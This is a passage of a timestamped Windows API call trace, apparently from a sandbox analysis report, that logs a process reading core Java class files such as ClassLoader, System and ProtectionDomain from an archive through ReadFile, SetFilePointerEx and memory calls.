ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x772a, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208ee30*=0x772a, lpOverlapped=0x0) returned 1 [0089.784] free (_Block=0x2114470) [0089.785] free (_Block=0x2111af0) [0089.791] strlen (_Str="java/lang/reflect/GenericDeclaration.class") returned 0x2a [0089.791] malloc (_Size=0x48) returned 0x2111870 [0089.791] malloc (_Size=0xa0) returned 0x21fe430 [0089.791] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341fc1d, lpNewFilePointer=0x208e740, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e740*=54656029) returned 1 [0089.791] ReadFile (in: hFile=0x134, lpBuffer=0x21fe430, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e710, lpOverlapped=0x0 | out: lpBuffer=0x21fe430*, lpNumberOfBytesRead=0x208e710*=0xa0, lpOverlapped=0x0) returned 1 [0089.792] malloc (_Size=0x2b) returned 0x2112f20 [0089.792] free (_Block=0x21fe430) [0089.792] strlen (_Str="java/lang/reflect/GenericDeclaration.class") returned 0x2a [0089.792] strcpy (in: _Dest=0x208e8c0, _Source="java/lang/reflect/GenericDeclaration.class" | out: _Dest="java/lang/reflect/GenericDeclaration.class") returned="java/lang/reflect/GenericDeclaration.class" [0089.792] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x32430d8, lpNewFilePointer=0x208e340, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e340*=52703448) returned 1 [0089.793] ReadFile (in: hFile=0x134, lpBuffer=0x208e390, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e310, lpOverlapped=0x0 | out: lpBuffer=0x208e390*, lpNumberOfBytesRead=0x208e310*=0x1e, lpOverlapped=0x0) returned 1 [0089.793] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3243120, lpNewFilePointer=0x208e3a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e3a0*=52703520) returned 1 [0089.793] ReadFile (in: hFile=0x134, lpBuffer=0x210a320, nNumberOfBytesToRead=0x101, lpNumberOfBytesRead=0x208e370, lpOverlapped=0x0 | out: lpBuffer=0x210a320*, lpNumberOfBytesRead=0x208e370*=0x101, lpOverlapped=0x0) returned 1 [0089.793] free (_Block=0x2114f10) [0089.793] free (_Block=0x2112680) [0089.794] strlen (_Str="java/lang/reflect/AnnotatedElement.class") returned 0x28 [0089.794] malloc (_Size=0x48) returned 0x2112680 [0089.794] malloc (_Size=0xa0) returned 0x21fe430 [0089.794] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341fbc7, lpNewFilePointer=0x208dc80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dc80*=54655943) returned 1 [0089.794] ReadFile (in: hFile=0x134, lpBuffer=0x21fe430, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dc50, lpOverlapped=0x0 | out: lpBuffer=0x21fe430*, lpNumberOfBytesRead=0x208dc50*=0xa0, lpOverlapped=0x0) returned 1 [0089.794] malloc (_Size=0x29) returned 0x2113520 [0089.795] free (_Block=0x21fe430) [0089.795] strlen (_Str="java/lang/reflect/AnnotatedElement.class") returned 0x28 [0089.795] strcpy (in: _Dest=0x208de00, _Source="java/lang/reflect/AnnotatedElement.class" | out: _Dest="java/lang/reflect/AnnotatedElement.class") returned="java/lang/reflect/AnnotatedElement.class" [0089.795] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x32423f9, lpNewFilePointer=0x208d880, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d880*=52700153) returned 1 [0089.796] ReadFile (in: hFile=0x134, lpBuffer=0x208d8d0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d850, lpOverlapped=0x0 | out: lpBuffer=0x208d8d0*, lpNumberOfBytesRead=0x208d850*=0x1e, lpOverlapped=0x0) returned 1 [0089.796] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x324243f, lpNewFilePointer=0x208d8e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d8e0*=52700223) returned 1 [0089.796] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0xc99, lpNumberOfBytesRead=0x208d8b0, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208d8b0*=0xc99, lpOverlapped=0x0) returned 1 [0089.797] free (_Block=0x2112f20) [0089.797] free (_Block=0x2111870) [0089.805] strlen (_Str="java/lang/reflect/Type.class") returned 0x1c [0089.805] malloc (_Size=0x48) returned 0x2111c30 [0089.805] malloc (_Size=0xa0) returned 0x21fe880 [0089.805] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341fb7d, lpNewFilePointer=0x208e740, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e740*=54655869) returned 1 [0089.805] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e710, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208e710*=0xa0, lpOverlapped=0x0) returned 1 [0089.805] malloc (_Size=0x1d) returned 0x2113f30 [0089.805] free (_Block=0x21fe880) [0089.805] strlen (_Str="java/lang/reflect/Type.class") returned 0x1c [0089.806] strcpy (in: _Dest=0x208e8c0, _Source="java/lang/reflect/Type.class" | out: _Dest="java/lang/reflect/Type.class") returned="java/lang/reflect/Type.class" [0089.806] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3242315, lpNewFilePointer=0x208e340, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e340*=52699925) returned 1 [0089.806] ReadFile (in: hFile=0x134, lpBuffer=0x208e390, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e310, lpOverlapped=0x0 | out: lpBuffer=0x208e390*, lpNumberOfBytesRead=0x208e310*=0x1e, lpOverlapped=0x0) returned 1 [0089.806] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x324234f, lpNewFilePointer=0x208e3a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e3a0*=52699983) returned 1 [0089.806] ReadFile (in: hFile=0x134, lpBuffer=0x210a2f0, nNumberOfBytesToRead=0xaa, lpNumberOfBytesRead=0x208e370, lpOverlapped=0x0 | out: lpBuffer=0x210a2f0*, lpNumberOfBytesRead=0x208e370*=0xaa, lpOverlapped=0x0) returned 1 [0089.806] free (_Block=0x2113520) [0089.806] free (_Block=0x2112680) [0089.837] malloc (_Size=0x48) returned 0x2111af0 [0089.837] malloc (_Size=0xa0) returned 0x121a6990 [0089.837] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341fb36, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54655798) returned 1 [0089.837] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0089.837] malloc (_Size=0x1a) returned 0x21140e0 [0089.838] free (_Block=0x121a6990) [0089.838] strlen (_Str="java/lang/Cloneable.class") returned 0x19 [0089.838] strcpy (in: _Dest=0x208f380, _Source="java/lang/Cloneable.class" | out: _Dest="java/lang/Cloneable.class") returned="java/lang/Cloneable.class" [0089.838] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3242297, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52699799) returned 1 [0089.838] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0089.839] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x32422ce, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52699854) returned 1 [0089.839] ReadFile (in: hFile=0x134, lpBuffer=0x20fe980, nNumberOfBytesToRead=0x47, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x20fe980*, lpNumberOfBytesRead=0x208ee30*=0x47, lpOverlapped=0x0) returned 1 [0089.839] free (_Block=0x2113f30) [0089.839] free (_Block=0x2111c30) [0089.841] strlen (_Str="java/lang/ClassLoader.class") returned 0x1b [0089.841] malloc (_Size=0x48) returned 0x2112680 [0089.841] malloc (_Size=0xa0) returned 0x121a6990 [0089.841] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341faed, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54655725) returned 1 [0089.842] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0089.842] malloc (_Size=0x1c) returned 0x21145f0 [0089.842] free (_Block=0x121a6990) [0089.842] strlen (_Str="java/lang/ClassLoader.class") returned 0x1b [0089.842] strcpy (in: _Dest=0x208f380, _Source="java/lang/ClassLoader.class" | out: _Dest="java/lang/ClassLoader.class") returned="java/lang/ClassLoader.class" [0089.842] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x323d1cf, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52679119) returned 1 [0089.842] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0089.845] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x323d208, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52679176) returned 1 [0089.845] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x508f, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208ee30*=0x508f, lpOverlapped=0x0) returned 1 [0089.846] free (_Block=0x21140e0) [0089.846] free (_Block=0x2111af0) [0089.871] strlen (_Str="java/lang/System.class") returned 0x16 [0089.871] malloc (_Size=0x48) returned 0x2111c80 [0089.871] malloc (_Size=0xa0) returned 0x121a6990 [0089.871] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341faa9, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54655657) returned 1 [0089.871] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0089.874] malloc (_Size=0x17) returned 0x21151f0 [0089.874] free (_Block=0x121a6990) [0089.875] strlen (_Str="java/lang/System.class") returned 0x16 [0089.875] strcpy (in: _Dest=0x208f380, _Source="java/lang/System.class" | out: _Dest="java/lang/System.class") returned="java/lang/System.class" [0089.875] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x323b803, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52672515) returned 1 [0089.875] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0089.877] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x323b837, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52672567) returned 1 [0089.877] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x1998, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208ee30*=0x1998, lpOverlapped=0x0) returned 1 [0089.878] free (_Block=0x21145f0) [0089.878] free (_Block=0x2112680) [0089.889] strlen (_Str="java/lang/Throwable.class") returned 0x19 [0089.889] malloc (_Size=0x48) returned 0x2112680 [0089.889] malloc (_Size=0xa0) returned 0x121a6990 [0089.889] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341fa62, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54655586) returned 1 [0089.890] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0089.891] malloc (_Size=0x1a) returned 0x2114050 [0089.891] free (_Block=0x121a6990) [0089.891] strlen (_Str="java/lang/Throwable.class") returned 0x19 [0089.892] strcpy (in: _Dest=0x208f380, _Source="java/lang/Throwable.class" | out: _Dest="java/lang/Throwable.class") returned="java/lang/Throwable.class" [0089.892] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3239b4f, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52665167) returned 1 [0089.892] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0089.894] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3239b86, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52665222) returned 1 [0089.894] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x1c7d, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208ee30*=0x1c7d, lpOverlapped=0x0) returned 1 [0089.895] free (_Block=0x21151f0) [0089.895] free (_Block=0x2111c80) [0089.911] strlen (_Str="java/lang/Error.class") returned 0x15 [0089.911] malloc (_Size=0x48) returned 0x2111af0 [0089.911] malloc (_Size=0xa0) returned 0x121a6990 [0089.911] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341fa1f, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54655519) returned 1 [0089.912] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0089.913] malloc (_Size=0x16) returned 0x21150b0 [0089.914] free (_Block=0x121a6990) [0089.914] strlen (_Str="java/lang/Error.class") returned 0x15 [0089.914] strcpy (in: _Dest=0x208f380, _Source="java/lang/Error.class" | out: _Dest="java/lang/Error.class") returned="java/lang/Error.class" [0089.914] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x323991b, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52664603) returned 1 [0089.914] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0089.916] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x323994e, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52664654) returned 1 [0089.916] ReadFile (in: hFile=0x134, lpBuffer=0x20fe960, nNumberOfBytesToRead=0x201, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x20fe960*, lpNumberOfBytesRead=0x208ee30*=0x201, lpOverlapped=0x0) returned 1 [0089.916] free (_Block=0x2114050) [0089.916] free (_Block=0x2112680) [0089.921] strlen (_Str="java/lang/ThreadDeath.class") returned 0x1b [0089.921] malloc (_Size=0x48) returned 0x2112680 [0089.921] malloc (_Size=0xa0) returned 0x121a6990 [0089.921] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341f9d6, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54655446) returned 1 [0089.921] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0089.922] malloc (_Size=0x1c) returned 0x2114290 [0089.923] free (_Block=0x121a6990) [0089.923] strlen (_Str="java/lang/ThreadDeath.class") returned 0x1b [0089.923] strcpy (in: _Dest=0x208f380, _Source="java/lang/ThreadDeath.class" | out: _Dest="java/lang/ThreadDeath.class") returned="java/lang/ThreadDeath.class" [0089.923] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x323981b, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52664347) returned 1 [0089.923] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0089.924] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3239854, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52664404) returned 1 [0089.924] ReadFile (in: hFile=0x134, lpBuffer=0x20fe980, nNumberOfBytesToRead=0xc7, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x20fe980*, lpNumberOfBytesRead=0x208ee30*=0xc7, lpOverlapped=0x0) returned 1 [0089.925] free (_Block=0x21150b0) [0089.925] free (_Block=0x2111af0) [0089.928] strlen (_Str="java/lang/Exception.class") returned 0x19 [0089.928] malloc (_Size=0x48) returned 0x2112090 [0089.928] malloc (_Size=0xa0) returned 0x121a6990 [0089.928] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341f98f, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54655375) returned 1 [0089.928] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0089.929] malloc (_Size=0x1a) returned 0x21143e0 [0089.929] free (_Block=0x121a6990) [0089.930] strlen (_Str="java/lang/Exception.class") returned 0x19 [0089.930] strcpy (in: _Dest=0x208f380, _Source="java/lang/Exception.class" | out: _Dest="java/lang/Exception.class") returned="java/lang/Exception.class" [0089.930] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x32395df, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52663775) returned 1 [0089.930] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0089.931] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3239616, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52663830) returned 1 [0089.931] ReadFile (in: hFile=0x134, lpBuffer=0x20fe980, nNumberOfBytesToRead=0x205, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x20fe980*, lpNumberOfBytesRead=0x208ee30*=0x205, lpOverlapped=0x0) returned 1 [0089.931] free (_Block=0x2114290) [0089.931] free (_Block=0x2112680) [0089.935] strlen (_Str="java/lang/RuntimeException.class") returned 0x20 [0089.935] malloc (_Size=0x48) returned 0x2112680 [0089.935] malloc (_Size=0xa0) returned 0x121a6990 [0089.935] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341f941, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54655297) returned 1 [0089.935] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0089.936] malloc (_Size=0x21) returned 0x2114050 [0089.936] free (_Block=0x121a6990) [0089.936] strlen (_Str="java/lang/RuntimeException.class") returned 0x20 [0089.936] strcpy (in: _Dest=0x208f380, _Source="java/lang/RuntimeException.class" | out: _Dest="java/lang/RuntimeException.class") returned="java/lang/RuntimeException.class" [0089.937] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3239395, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52663189) returned 1 [0089.937] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0089.938] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x32393d3, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52663251) returned 1 [0089.938] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x20c, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208ee30*=0x20c, lpOverlapped=0x0) returned 1 [0089.939] free (_Block=0x21143e0) [0089.939] free (_Block=0x2112090) [0089.944] strlen (_Str="java/lang/SecurityManager.class") returned 0x1f [0089.944] malloc (_Size=0x48) returned 0x2111cd0 [0089.944] malloc (_Size=0xa0) returned 0x121a6990 [0089.944] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341f8f4, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54655220) returned 1 [0089.944] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0089.945] malloc (_Size=0x20) returned 0x21143e0 [0089.946] free (_Block=0x121a6990) [0089.946] strlen (_Str="java/lang/SecurityManager.class") returned 0x1f [0089.946] strcpy (in: _Dest=0x208f380, _Source="java/lang/SecurityManager.class" | out: _Dest="java/lang/SecurityManager.class") returned="java/lang/SecurityManager.class" [0089.946] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x323721d, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52654621) returned 1 [0089.946] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0089.948] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x323725a, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52654682) returned 1 [0089.948] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x213b, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208ee30*=0x213b, lpOverlapped=0x0) returned 1 [0089.949] free (_Block=0x2114050) [0089.949] free (_Block=0x2112680) [0089.964] strlen (_Str="java/security/ProtectionDomain.class") returned 0x24 [0089.964] malloc (_Size=0x48) returned 0x2111c30 [0089.964] malloc (_Size=0xa0) returned 0x121a6990 [0089.964] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341f8a2, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54655138) returned 1 [0089.964] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0089.965] malloc (_Size=0x25) returned 0x2113f30 [0089.965] free (_Block=0x121a6990) [0089.965] strlen (_Str="java/security/ProtectionDomain.class") returned 0x24 [0089.966] strcpy (in: _Dest=0x208f380, _Source="java/security/ProtectionDomain.class" | out: _Dest="java/security/ProtectionDomain.class") returned="java/security/ProtectionDomain.class" [0089.966] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3235bb3, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52648883) returned 1 [0089.966] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0089.967] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3235bf5, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52648949) returned 1 [0089.968] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x1628, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208ee30*=0x1628, lpOverlapped=0x0) returned 1 [0089.969] free (_Block=0x21143e0) [0089.970] free (_Block=0x2111cd0) [0089.976] strlen (_Str="java/security/AccessControlContext.class") returned 0x28 [0089.976] malloc (_Size=0x48) returned 0x2112680 [0089.976] malloc (_Size=0xa0) returned 0x121a6990 [0089.976] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341f84c, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54655052) returned 1 [0089.976] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0089.977] malloc (_Size=0x29) returned 0x2113020 [0089.978] free (_Block=0x121a6990) [0089.978] strlen (_Str="java/security/AccessControlContext.class") returned 0x28 [0089.978] strcpy (in: _Dest=0x208f380, _Source="java/security/AccessControlContext.class" | out: _Dest="java/security/AccessControlContext.class") returned="java/security/AccessControlContext.class" [0089.978] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3233a71, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52640369) returned 1 [0089.978] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0089.980] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3233ab7, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52640439) returned 1 [0089.980] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x20fc, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208ee30*=0x20fc, lpOverlapped=0x0) returned 1 [0089.981] free (_Block=0x2113f30) [0089.985] free (_Block=0x2111c30) [0090.007] strlen (_Str="java/security/SecureClassLoader.class") returned 0x25 [0090.007] malloc (_Size=0x48) returned 0x2111ff0 [0090.007] malloc (_Size=0xa0) returned 0x121a6990 [0090.007] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341f7f9, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54654969) returned 1 [0090.007] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, 